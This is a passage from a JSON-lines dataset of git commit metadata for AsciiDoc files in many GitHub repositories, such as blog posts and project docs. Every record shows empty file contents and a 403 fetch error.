<36c2cbde021a457239efc9ba0c855feb82a5b5b7@opennms.org>\n","repos":"rdkgit\/opennms,aihua\/opennms,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/ImapMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/ImapMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tdefilip\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 
{"commit":"b7a73196101dbf94ea9992ef2b4f548b84ec43bf","subject":"describe a team","message":"describe a team\n","repos":"EMBL-EBI-SUBS\/subs,EMBL-EBI-SUBS\/subs","old_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_file":"subs-api\/src\/main\/resources\/docs\/how_to_submit_data_programatically.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EMBL-EBI-SUBS\/subs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"da9c673230cb5be3819e1e6ccf66056ea71c6213","subject":"y2b create post CALL ME NOW 647-403-3436","message":"y2b create post CALL ME NOW 647-403-3436","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-03-CALL-ME-NOW-6474033436.adoc","new_file":"_posts\/2016-09-03-CALL-ME-NOW-6474033436.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fee2701eda70bfd355d086b70904f284807159e1","subject":"Update 2016-11-05-About-The-Dullest-Saga.adoc","message":"Update 2016-11-05-About-The-Dullest-Saga.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_file":"_posts\/2016-11-05-About-The-Dullest-Saga.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9102742c872e1d3f43baa52b19294d5d715e5e0b","subject":"Update 2016-11-08-181300-Tuesday-Workday.adoc","message":"Update 2016-11-08-181300-Tuesday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_file":"_posts\/2016-11-08-181300-Tuesday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75211c236364f8a5243c2c50d7f4bd1ee7a36557","subject":"Update 2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","message":"Update 2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","repos":"wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io,wesamhaboush\/wesamhaboush.github.io","old_file":"_posts\/2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","new_file":"_posts\/2016-05-08-Project-Euler-Problem-29-Distinct-Powers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wesamhaboush\/wesamhaboush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"193fa3bfc15e848a393ebe297eae351137a460fb","subject":"Adding log4j note","message":"Adding log4j 
note\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-12-14-note-on-log4j-security.adoc","new_file":"_posts\/2021-12-14-note-on-log4j-security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3fa03199dbd2238d35a16a2c612f9cb1b64d09f","subject":"y2b create post $300 Fan Shopping Challenge With Android Pay","message":"y2b create post $300 Fan Shopping Challenge With Android Pay","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-30-300-Fan-Shopping-Challenge-With-Android-Pay.adoc","new_file":"_posts\/2016-10-30-300-Fan-Shopping-Challenge-With-Android-Pay.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c65f56dac8c4672d774bc57bc57975214339bc9","subject":"Update 2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","message":"Update 2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","new_file":"_posts\/2018-07-26-Stringhash-Code-is-not-even-a-little-unique.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e243f9a2b2455aa8384572df28c1f72c1fb8b476","subject":"Update 2016-06-28-First-post.adoc","message":"Update 2016-06-28-First-post.adoc","repos":"darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io,darsto\/darsto.github.io","old_file":"_posts\/2016-06-28-First-post.adoc","new_file":"_posts\/2016-06-28-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/darsto\/darsto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87492a2627bc1ea331a608d43585a61427c5c27a","subject":"Update 2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","message":"Update 2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","repos":"tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io,tedbergeron\/tedbergeron.github.io","old_file":"_posts\/2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","new_file":"_posts\/2017-02-02-Storage-Service-publish-once-distribute-everywhere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedbergeron\/tedbergeron.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"664f37555e8496d5f539d0b60a6f58392fe258c2","subject":"add test doc with complex purpose section.","message":"add test doc with complex purpose section.\n\nThis commit message is also on multiple rows\nand uses *_asciidoc_* notation as a 
test.\n","repos":"rillbert\/giblish,rillbert\/giblish,rillbert\/giblish","old_file":"data\/testdocs\/wellformed\/adorned_purpose.adoc","new_file":"data\/testdocs\/wellformed\/adorned_purpose.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rillbert\/giblish.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ba38ac9e9640527f83c4b328645bbbeb76c56e9","subject":"Update 2018-11-08-develop.adoc","message":"Update 2018-11-08-develop.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-08-develop.adoc","new_file":"_posts\/2018-11-08-develop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ebea0c86a595d609e83a9539273ebb4d107faed2","subject":"y2b create post Don't Miss These Prime Day Tech Deals!","message":"y2b create post Don't Miss These Prime Day Tech Deals!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-10-Dont-Miss-These-Prime-Day-Tech-Deals.adoc","new_file":"_posts\/2017-07-10-Dont-Miss-These-Prime-Day-Tech-Deals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"029451119b34d155e61c1d780110950ec84a8eba","subject":"Renamed '_posts\/2017-05-16-Faster-IDE.adoc' to '_posts\/2017-05-16-IDE-Faster-IDE.adoc'","message":"Renamed '_posts\/2017-05-16-Faster-IDE.adoc' to '_posts\/2017-05-16-IDE-Faster-IDE.adoc'","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2017-05-16-IDE-Faster-IDE.adoc","new_file":"_posts\/2017-05-16-IDE-Faster-IDE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"770ce79ee6bec93d5a89f375283000d6938e0156","subject":"#169: added README for cli","message":"#169: added README for cli\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"cli\/README.adoc","new_file":"cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6164a36b957e38f712b0a2a5cbdd25e74b7a8c10","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"3c68ff180ce22139b7ad0c284807b41f24f9470f","subject":"Create intellij.adoc","message":"Create intellij.adoc","repos":"swehacker\/cheatsheets,swehacker\/cheatsheets","old_file":"drafts\/intellij.adoc","new_file":"drafts\/intellij.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/swehacker\/cheatsheets.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b49a9b0142dd149c1ebbcd1d96d84573f833bf2d","subject":"Deleted 2016-6-25-Git-one.adoc","message":"Deleted 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4a7ef9bb3883fd6dc74cc34a218ec3c3f66c5dba","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-commons","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-commons.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83e03bdfdfd28665af41febe00f31fdc631f5f2a","subject":"Update 2015-08-05-staratup.adoc","message":"Update 2015-08-05-staratup.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-08-05-staratup.adoc","new_file":"_posts\/2015-08-05-staratup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"74e8b08090b91fd1748eefd31fb0025a061d5e27","subject":"Update 2017-03-02-A-F-Poem.adoc","message":"Update 2017-03-02-A-F-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-03-02-A-F-Poem.adoc","new_file":"_posts\/2017-03-02-A-F-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b46b4aa4c500af3541ff21375429104097829fd","subject":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","message":"Delete the file at '_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-24-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d11bc4a339d509a6b33e31bf98b8c5bf5c7e12c","subject":"Update 2015-05-16-Faustino-loeza-Perez8.adoc","message":"Update 
2015-05-16-Faustino-loeza-Perez8.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez8.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7941f8fc804e8e03233559b77ea5ddff374253ff","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d45a8bb054beac7aab867dddb31bbdfef74b0c7","subject":"Update 2017-03-15-Hadoop-etat-des-lieux.adoc","message":"Update 2017-03-15-Hadoop-etat-des-lieux.adoc","repos":"Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io,Ardemius\/ardemius.github.io","old_file":"_posts\/2017-03-15-Hadoop-etat-des-lieux.adoc","new_file":"_posts\/2017-03-15-Hadoop-etat-des-lieux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ardemius\/ardemius.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b31c8b9da4513b5003bc14124b9b252ad94f677","subject":"Update 2016-01-11-We-can-be-heroes.adoc","message":"Update 2016-01-11-We-can-be-heroes.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2016-01-11-We-can-be-heroes.adoc","new_file":"_posts\/2016-01-11-We-can-be-heroes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a973c8d8e7d3cf6c2a0b8a866a18a12bbf102760","subject":"Update 2016-01-30-My-English-Title.adoc","message":"Update 2016-01-30-My-English-Title.adoc","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/2016-01-30-My-English-Title.adoc","new_file":"_posts\/2016-01-30-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca99312e63c82c958f1108ca2d27cac6588de28f","subject":"Update 2017-01-28-Livros-de-Prolog.adoc","message":"Update 2017-01-28-Livros-de-Prolog.adoc","repos":"minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io,minicz\/minicz.github.io","old_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_file":"_posts\/2017-01-28-Livros-de-Prolog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/minicz\/minicz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee8596acca86768bf3cc4bb3b74ad78256aa82b4","subject":"Update 
2019-01-31-My-English-Title.adoc","message":"Update 2019-01-31-My-English-Title.adoc","repos":"akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io,akhmetgali\/hubpress.io","old_file":"_posts\/2019-01-31-My-English-Title.adoc","new_file":"_posts\/2019-01-31-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/akhmetgali\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2ec19f4029815f5e6c8c8c535bed37b2a102f6ac","subject":"Update 2016-03-21-Disney-After-Hours-coming-to-Magic-Kingdom.adoc","message":"Update 2016-03-21-Disney-After-Hours-coming-to-Magic-Kingdom.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-21-Disney-After-Hours-coming-to-Magic-Kingdom.adoc","new_file":"_posts\/2016-03-21-Disney-After-Hours-coming-to-Magic-Kingdom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"22766a51312738c5e60525bb2648f9d597ecc6be","subject":"Update 2016-03-29-Clueless-hackers-hit-water-treatment-plant.adoc","message":"Update 2016-03-29-Clueless-hackers-hit-water-treatment-plant.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-29-Clueless-hackers-hit-water-treatment-plant.adoc","new_file":"_posts\/2016-03-29-Clueless-hackers-hit-water-treatment-plant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0691c552fd7addfafa77d570be5974dedbc0582a","subject":"Update 2016-05-24-P-F-A-J-A-X-event-wont-update-backing-bean.adoc","message":"Update 2016-05-24-P-F-A-J-A-X-event-wont-update-backing-bean.adoc","repos":"grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io,grzrobak\/grzrobak.github.io","old_file":"_posts\/2016-05-24-P-F-A-J-A-X-event-wont-update-backing-bean.adoc","new_file":"_posts\/2016-05-24-P-F-A-J-A-X-event-wont-update-backing-bean.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/grzrobak\/grzrobak.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"231b992fd9fb170401b0cd5b296c35f8c2eac107","subject":"Moved Security Advisories documentation to repo","message":"Moved Security Advisories documentation to 
repo\n","repos":"DariusX\/camel,tdiesler\/camel,zregvart\/camel,christophd\/camel,pax95\/camel,DariusX\/camel,tadayosi\/camel,punkhorn\/camel-upstream,punkhorn\/camel-upstream,CodeSmell\/camel,mcollovati\/camel,tadayosi\/camel,mcollovati\/camel,tadayosi\/camel,christophd\/camel,apache\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,apache\/camel,gnodet\/camel,nikhilvibhav\/camel,onders86\/camel,adessaigne\/camel,pmoerenhout\/camel,cunningt\/camel,CodeSmell\/camel,gnodet\/camel,pax95\/camel,tdiesler\/camel,CodeSmell\/camel,adessaigne\/camel,zregvart\/camel,nicolaferraro\/camel,adessaigne\/camel,gnodet\/camel,tadayosi\/camel,DariusX\/camel,objectiser\/camel,apache\/camel,adessaigne\/camel,adessaigne\/camel,zregvart\/camel,ullgren\/camel,punkhorn\/camel-upstream,Fabryprog\/camel,kevinearls\/camel,pax95\/camel,apache\/camel,mcollovati\/camel,zregvart\/camel,tdiesler\/camel,pmoerenhout\/camel,onders86\/camel,Fabryprog\/camel,apache\/camel,davidkarlsen\/camel,adessaigne\/camel,Fabryprog\/camel,apache\/camel,onders86\/camel,pmoerenhout\/camel,DariusX\/camel,ullgren\/camel,alvinkwekel\/camel,ullgren\/camel,CodeSmell\/camel,christophd\/camel,gnodet\/camel,ullgren\/camel,objectiser\/camel,alvinkwekel\/camel,onders86\/camel,tdiesler\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,alvinkwekel\/camel,nicolaferraro\/camel,alvinkwekel\/camel,mcollovati\/camel,nicolaferraro\/camel,gnodet\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,tdiesler\/camel,kevinearls\/camel,pax95\/camel,nikhilvibhav\/camel,kevinearls\/camel,davidkarlsen\/camel,cunningt\/camel,objectiser\/camel,davidkarlsen\/camel,christophd\/camel,nikhilvibhav\/camel,objectiser\/camel,christophd\/camel,onders86\/camel,pmoerenhout\/camel,kevinearls\/camel,onders86\/camel,kevinearls\/camel,pmoerenhout\/camel,Fabryprog\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,cunningt\/camel,kevinearls\/camel","old_file":"docs\/user-manual\/en\/security-advisories.adoc","new_file":"docs\/user-manual\/en\/security-advisories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10eb09d0ba2e25096c7351b295214ef0af0d3c0e","subject":"use same format for default key as other keys","message":"use same format for default key as other keys\n","repos":"ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,Yubico\/yubico-piv-tool,akgood\/yubico-piv-tool,ato\/yubico-piv-tool,Yubico\/yubico-piv-tool,hirden\/yubico-piv-tool,akgood\/yubico-piv-tool,akgood\/yubico-piv-tool","old_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_file":"doc\/YubiKey_NEO_PIV_introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-piv-tool.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"538e2b371c92f646a4e7d6dfb8f4e38393718137","subject":"Random fixes for doc style guide layout and links","message":"Random fixes for doc style guide layout and links\n\nThere were a few issues on this page fixed in this patch:\n1. The \"note\" example was too long and broke the layout of the page\n2. 
Several of the bare links did not work\n\nChange-Id: I6d2a407334c7cff5c19879098abf9d53dcf91099\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1289\nReviewed-by: Misty Stanley-Jones <b9f9ef9e00c258208ea831c64cc129eda4ac78b4@apache.org>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"cloudera\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/style_guide.adoc","new_file":"docs\/style_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"acd9252e5b63c6222280de9a58b21c2b63199c59","subject":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-26-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fdea2c0474ce7c573e2dd250f29c72a4c2347e6a","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"8db0799a5b4d4bd87c702833025203fad6a63296","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45acf060af08e23380a6b0267d43410177134cd0","subject":"Update 2017-08-21-check-commit-message.adoc","message":"Update 
2017-08-21-check-commit-message.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-21-check-commit-message.adoc","new_file":"_posts\/2017-08-21-check-commit-message.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bfe47f9a2b3526fe68eb0bb09557dc7e8859e48","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 